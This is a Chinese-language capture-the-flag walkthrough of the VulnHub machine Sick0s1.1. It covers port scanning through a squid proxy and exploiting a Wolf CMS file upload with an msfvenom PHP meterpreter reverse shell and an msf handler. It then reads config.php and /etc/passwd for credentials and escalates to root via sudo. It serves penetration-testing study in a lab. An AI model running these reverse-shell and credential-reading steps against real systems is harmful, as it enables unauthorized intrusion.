靶机地址:Sick0s1.1~ VulnHub
难易程度:1.5 / 10.0文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢!
摘要:扫描出80、3128端口,设置3128代理访问80端口,信息搜集后得知为wolfcms框架,google相关漏洞信息,有文件上传和代码执行漏洞,使用msfvenom生成反向连接脚本,上传后,在本地使用msf的监听模块,获取到低权限后,根据/etc/passwd和config.php文件登录进sickos用户,直接提权
待完善地方:weevely工具连接,g++编译文件
主机探测&端口扫描
靶机ip为:192.168.1.12
端口扫描结果:
hhh@Kali2020:~$ sudo nmap -sS -p- 192.168.1.12
[sudo] hhh 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-06 11:07 CST
Nmap scan report for sickos (192.168.1.12)
Host is up (0.00029s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EA:11:1C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 104.47 seconds
信息搜集
这里直接访问80端口,并没有用,需要搭建代理,在firefox上面设置代理 192.168.1.12:3128
对网站进行扫描:
hhh@Kali2020:~$ nikto -h 192.168.1.12 -useproxy http://192.168.1.12:3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.12
+ Target Hostname: 192.168.1.12
+ Target Port: 80
+ Proxy: 192.168.1.12:3128
+ Start Time: 2021-02-06 13:34:43 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec 5 08:35:02 2015
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ 8726 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2021-02-06 13:40:21 (GMT8) (338 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
在robots.txt中有提示改网站框架为wolfcms
在google中搜索相关信息,搜索到文件上传|代码执行漏洞
Wolf CMS - Arbitrary File Upload / Execution
根据漏洞的演示进行权限获取
A)Login as regular user ( who have access upload functionality )
B)Go to this page -
http://targetsite.com/wolfcms/?/admin/plugin/file_manager/browse/
C)Select upload an file option to upload Arbitary File ( filename ex:
"hello.php" )
D)Now you can access the file by here -
http://targetsite.com/wolfcms/public/hello.php
相关漏洞信息:
权限获取
之前学了weevely工具,在这里稍微使用,但是并没有用,可能一些细节知识没有掌握,也尝试使用菜刀和蚁剑进行尝试连接连接,但也没有用,过段时间再看
- 生成反向连接脚本reverse_tcp,设置本地kali的ip和端口号
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.15 lport=4444 -f row
-
写入文件shell.php
-
在上传页面上传该文件
192.168.1.12/wolfcms/?/admin/plugin/file_manager/browse/
- 本地开启监听
msfconsole # 启动MSF
use exploit/multi/handler # 使用模块
set payload php/meterpreter/reverse_tcp # 设置载荷
show options # 显示一些设置
set lhost 192.168.1.15
set lport 4444
expolit
- 在网站上打开该脚本
http://192.168.1.12/wolfcms/public/shell.php
- msf上面接收到反向连接的信息,输入shell即可建立连接
权限提升
这里一开始想使用dirtycow进行提权,但是靶机上没有g++,kali编译后和实际执行的环境并不一致,报错
cannot execute binary file
,这个以后再分析分析
在目录下搜索到文件config.php,在里面查看到mysql密码
查看/etc/passwd文件,发现sickos用户为第一用户
尝试用刚刚的密码登录该用户
su sickos # 切换用户
发现sickos的权限挺高
sudo -l # 查看当前用户的sudo权限
直接进行权限获取
sudo -s # 执行指定shell(passwd里面显示的shell)
sudo su:切换到root权限,环境也变化
sudo -s:切换到超级用户权限,但是使用原用户的环境
总结
- 代理3128端口
- wolfcms
- reverse_tcp
- /etc/passwd